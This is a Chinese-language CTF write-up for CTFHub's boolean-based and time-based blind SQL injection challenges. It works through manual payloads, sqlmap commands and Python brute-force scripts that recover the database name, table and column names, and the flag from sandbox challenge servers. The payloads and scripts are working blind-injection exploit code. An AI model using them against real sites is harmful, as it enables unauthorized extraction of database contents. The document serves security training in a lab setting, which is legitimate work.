CTFHub-Web-sql注入练习（二）

布尔盲注

Length（）函数 返回字符串的长度
Substr（）截取字符串，有三个参数，第一个是要截取的字符串，第二个是从第几个字符开始，第三个是一次截取多少个字符
ascii（） 字符的ASCII码值

输入1 and 1=1，回显query_success,提示查询成功

输入1 and 1=2,回显query_error,数据库查询结果为空或者查询语句报错，回显error。

手工注入

1.首先判断数据库长度

?id=1 and length(database())>5	#query_error
?id=1 and length(database())=4   #query_success

说明数据库名字长度为4

2.继续看数据库名字
手注配合bp爆破

结果如下

?id=1 and ascii(substr(database(),1,1))=115

?id=1 and ascii(substr(database(),2,1))=113

?id=1 and ascii(substr(database(),3,1))=108

?id=1 and ascii(substr(database(),4,1))=105

数据库名为sqli

3.判断数据库中字段数

?id=1 and (select count(table_name) from information_schema.tables where table_schema=database())=2

该数据库中含有两张表

4.判断表名

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=119

 ?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115

第一张表名为news

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=108

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=97

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=103

第二张表名为flag

5.判断flag表中字段名称

?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102

?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),2,1))=108

?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),3,1))=97

?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),4,1))=103

字段名为flag

sqlmap注入

爆数据库名

python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 --dbs

得到数据库名sqli

接着我们爆破表：

python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables 

得到表名flag

查字段

python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

查到flag表里面有个flag列

爆值

python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

得到flag

python脚本注入

爆库名

import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
url='http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/?id='
length=4
name = ''
for j in range(1,length+1):
	for i in dic:
		urls = url+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
		r = requests.get(urls)
		if 'query_success' in r.text:
			name = name+i
			print(name)
			break
print('database_name:',name)

得到库名sqli

s
sq
sql
sqli
database_name: sqli

爆表

import requests
import string

dic = string.digits + string.ascii_letters
url='http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/?id='
list = []
for k in range(0,4):
    name=''
    for j in range(1,9):
        for i in dic:
            urls = url +'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
            r = requests.get(urls)
            if 'query_success' in r.text:
                name = name+i
                break
    list.append(name)
print('table_name:',list)

两个表，分别为news和flag

table_name: ['news', 'flag', '', '']

查字段

import requests
import string
url='http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/?id='
dic = string.digits + string.ascii_letters

list = []
for k in range(0, 3):
    name = ''
    for j in range(1, 9):
        for i in dic:
             urls = url+ 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (k, j, i)
             r = requests.get(urls)
             if 'query_success' in r.text:
                name = name + i
                break
    list.append(name)
print('column_name:', list)

字段名为flag

column_name: ['flag', '', '']

爆值

import requests
url='http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/?id='
name = ''
for j in range(1, 50):
     for i in range(48, 126):
        urls = url+ 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (j, i)
        r = requests.get(urls)
        if 'query_success' in r.text:
            name = name + chr(i)
            print(name)
            break
print('flag:', name)

得到flag

ctfhub{8ce1bf6d1763687b88a521eb}

时间盲注

随便输了个1，提示什么都不返回

手工注入

1.时间盲注测数据库名字长度

?id=1 and if(length(database())=4,sleep(3),1)

说明数据库名长度为4

2.测数据库名字

?id=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)	

?id=1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)	

?id=1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)	

?id=1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)	

结合ascll码知数据库名为sqli

3.测字段数

?id=1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(3),1)

故数据库中有两张表

4.测表名

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=119,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115,sleep(3),1)

故第一张表的表名为news

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=108,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=97,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=103,sleep(3),1)

故第二张表的表名为flag

5.测flag表的字段数

?id=1 and if((select count(column_name) from information_schema.columns where table_name='flag')=1,sleep(3),1)

字段数为1

6.测字段

?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102,sleep(3),1)

?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=108,sleep(3),1)

?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=97,sleep(3),1)

?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=103,sleep(3),1)

故字段名为flag

脚本注入

爆库名

import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/?id='

name = ''
for i in range(1, 5):
    for j in string.ascii_letters:
        urls = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
        time_start = time.time()
        r = requests.get(urls)
        time_end = time.time()
        if time_end-time_start > 2:
            name += j
            break
    print(name)
print('database_name:', name)

运行结果

s
sq
sql
sqli
database_name: sqli

爆表

import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/?id='

list = []
for i in range(0, 2):
    name = ''
    for j in range(1, 9):
        for k in string.ascii_letters:
            urls = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
            time_start = time.time()
            r = requests.get(urls)
            time_end = time.time()
            if time_end-time_start > 2:
                name += k
                break
    list.append(name)
print('table_name:', list)

运行结果

table_name: ['news', 'flag']

爆字段

import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/?id='

list = []
for i in range(0, 1):
    name = ''
    for j in range(1, 9):
        for k in string.ascii_letters:
            urls = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
            time_start = time.time()
            r = requests.get(urls)
            time_end = time.time()
            if time_end - time_start > 2:
                name += k
                break
    list.append(name)
print('column_name:', list)

运行结果

column_name: ['flag']

爆值

import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/?id='

name = ''
for i in range(1, 50):
    for j in range(48, 126):
        urls = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (i, j)
        r = requests.get(urls)
        time_start = time.time()
        r = requests.get(urls)
        time_end = time.time()
        if time_end-time_start > 2:
            name += chr(j)
            print(name)
            break
print('data:', name)

时间太长了，爬，终于得到flag